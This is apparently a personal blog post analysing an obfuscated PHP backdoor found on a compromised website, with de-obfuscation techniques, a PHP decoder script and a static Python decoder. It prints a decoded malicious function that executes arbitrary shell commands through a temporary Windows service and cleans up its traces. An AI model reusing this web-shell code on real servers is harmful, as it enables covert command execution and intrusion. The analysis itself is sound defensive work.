Decode: eval_gzinflate_base64_decode

If you follow my posts, you know that some time back I wrote about my encounter with web attacks, which was an amazing experience. I am a lazy kind of person, and with all this IPL fever these days I don’t even think of blogging or doing personal research.

So what made me sit and write today?

The answer is, my same old friend pinged me for help with one of his old website maintenance projects. They found the website was making suspicious outbound connections and customers were receiving junk emails from the domain. My friend was assigned to look into the issue. He asked for my help and I decided to jump in and get my hands dirty…

I asked him to get me all the suspicious-looking files from the hosted web server for analysis, and within a few minutes he sent me some PHP files.

The PHP file was filled with what looked like total junk, similar to the following:

eval(gzinflate(base64_decode('7b37QhtH8ij8P0/RniiLFEtCYOeGDA4GHHOCjRfwZnMwRxlpRjCLpFFmRmCv1+d9vmc4L/fVpa9zkQS2c9mfnV1b05fq6u7q6urq6qrauBPv
9S4fDn4KJ4Ot1a/+z5c64cv/89Vq9/H2yqPHNbvQxtbq/71X1ymNe/9XlXr+didJ/Le9kyyJJhe9n8K36ZZPKVfws17rHe///dX+yWmjO4wTUYfyh3E8PZhk4UWYbHW6bsKjrUE8m2
RWtdZ6rsj9+413OvusrP0zt8L5+VaaJb0knI78QVh3+tX01rzmLaE1uh+t+Y2m175D+++XHPof92897FilYsg (cut for brevity)

Looking at the code, I realized this routine definitely contained malicious code. This was my first experience with PHP-based de-obfuscation. I googled a bit and got a pointer to some PHP code used for decoding this gzinflate() routine. I downloaded that file and realized I did not have php-cli/php-cgi installed on my office Debian box.

I quickly did “apt-get install php5-cli” and started the PHP installation. In the meanwhile, I decided to apply my JavaScript de-obfuscation knowledge and some common sense to this problem 😉

In JavaScript, we used to replace eval() with document.write(), and instead of running the code we would display the decoded script using alert().

In PHP, I tried replacing eval() with echo(), and guess what, it worked like a charm 😉

After running the modified encoded PHP file, it decoded all the code and spat it out on my stdout. I redirected it to a file and started analyzing…

It was again PHP code, containing a handful of functions for tasks like mass mailing, dictionary attacks, port scanning, SQL injection, etc.

Here is one of the decoded functions:

function srvshelL($command){
    // Output of the command is dropped into a uniquely named file in the temp directory
    $name=whereistmP()."\\".uniqid('NJ');
    $n=uniqid('NJ');
    // Locate cmd.exe through %ComSpec%, falling back to a hard-coded path
    $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
    // A throw-away Windows service is registered with cmd.exe as its binary, started once, stopped and removed again
    win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
    win32_start_service($n);
    win32_stop_service($n);
    win32_delete_service($n);
    // Wait for the redirected output to appear, read it back and remove the trace
    while(!file_exists($name))sleep(1);
    $exec=file_get_contents($name);
    unlink($name);
    return $exec;
}

I compared the output of the echo() trick with that of the PHP file downloaded from the internet. It was the same. Here is the PHP code used for decoding eval(gzinflate(base64_decode())) code.

<?php
/*
Taken from http://www.php.net/manual/de/function.eval.php#59862
Directions:
1. Save this snippet as decrypt.php
2. Save encoded PHP code in coded.txt
3. Create a blank file called decoded.txt (from shell do CHMOD 0666 decoded.txt)
4. Execute this script (visit decrypt.php in a web browser or do php decrypt.php in the shell)
5. Open decoded.txt, the PHP should be decrypted if not post the code on http://www.ariadoss.com/forums/web-development/lamp
*/

echo "\nDECODE nested eval(gzinflate()) by DEBO Jurgen <jurgen@person.be>\n\n";

echo "1. Reading coded.txt\n";

$fp1 = fopen("coded.txt", "r");
$contents = fread($fp1, filesize("coded.txt"));
fclose($fp1);

echo "2. Decoding\n";

// Each pass unwraps one layer: strip the PHP tags, then turn "eval(" into an assignment,
// so the outer eval() only runs gzinflate(base64_decode()) and stores the next layer instead of executing it.
while (preg_match("/eval\(gzinflate/", $contents)) {
    // "<\?php" has to be stripped before "<\?", otherwise a stray "php" token is left behind
    // and the eval() below fails with a parse error on long-tag files.
    $contents = preg_replace("/<\?php|<\?|\?>/", "", $contents);
    // Word boundaries keep the replacement from hitting identifiers such as "evaluate" inside the decoded layer.
    eval(preg_replace("/\beval\b/", "\$contents=", $contents));
}
echo "3. Writing decoded.txt\n";

$fp2 = fopen("decoded.txt", "w");
fwrite($fp2, trim($contents));
fclose($fp2);
?>
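Both the echo() trick and the decrypt.php script let PHP itself do the unwrapping, which means PHP still runs gzinflate(base64_decode()) on attacker-supplied data and would execute anything in a layer that sits outside the eval() call. As an added example (not code from the original post or from the php.net snippet), here is the same nested decode done statically in Python: PHP's gzinflate() is raw DEFLATE, which zlib handles when given a negative window size, so no PHP is executed at all. The regex for the wrapper, the layer limit and the constructed sample payload are my assumptions; the real sample from the post is not reproduced here.

```python
import base64
import re
import zlib
from typing import Optional, Tuple

# Matches the wrapper seen in the post: eval(gzinflate(base64_decode('...')));
# Base64 blobs in these files are often wrapped across lines, so whitespace is allowed inside.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)"
    r"['\"]\s*\)\s*\)\s*\)\s*;?"
)


def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() is raw DEFLATE with no zlib/gzip header; negative wbits tells zlib the same."""
    return zlib.decompress(data, -zlib.MAX_WBITS)


def decode_layer(php_source: str) -> Optional[str]:
    """Unwrap one eval(gzinflate(base64_decode())) layer, splicing the decoded code in place of the eval() call.

    Returns None when no wrapper is present, which is the loop's stop condition.
    """
    m = WRAPPER.search(php_source)
    if m is None:
        return None
    blob = re.sub(r"\s+", "", m.group(1))
    inner = gzinflate(base64.b64decode(blob, validate=True)).decode("utf-8", errors="replace")
    return php_source[: m.start()] + inner + php_source[m.end() :]


def decode_all(php_source: str, max_layers: int = 50) -> Tuple[str, int]:
    """Peel nested layers until no wrapper remains; max_layers guards against a self-reproducing blob."""
    layers = 0
    while layers < max_layers:
        nxt = decode_layer(php_source)
        if nxt is None:
            break
        php_source = nxt
        layers += 1
    return php_source, layers


# --- constructed test data (not from the post) -------------------------------

def php_encode(plain: str) -> str:
    """Wrap PHP code the way the obfuscator does: raw DEFLATE, then base64, then the eval() call."""
    compressor = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = compressor.compress(plain.encode("utf-8")) + compressor.flush()
    return "eval(gzinflate(base64_decode('" + base64.b64encode(raw).decode("ascii") + "')));"


HARMLESS_PAYLOAD = "echo 'decoded layer';"  # constructed stand-in for the real sample


def build_nested_sample(depth: int = 3) -> str:
    """Produce a <?php ... ?> file with `depth` nested wrapper layers around HARMLESS_PAYLOAD."""
    src = HARMLESS_PAYLOAD
    for _ in range(depth):
        src = php_encode(src)
    return "<?php " + src + " ?>"


if __name__ == "__main__":
    sample = build_nested_sample(3)
    decoded, n = decode_all(sample)
    print(f"peeled {n} layer(s):")
    print(decoded)
```

Run it on a real file with `decode_all(open("coded.txt").read())`; the layer count tells you how deep the nesting went, and because each layer is spliced back in place, any code the obfuscator left outside the eval() call is preserved in the output for review rather than silently executed.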

Enjoy!!
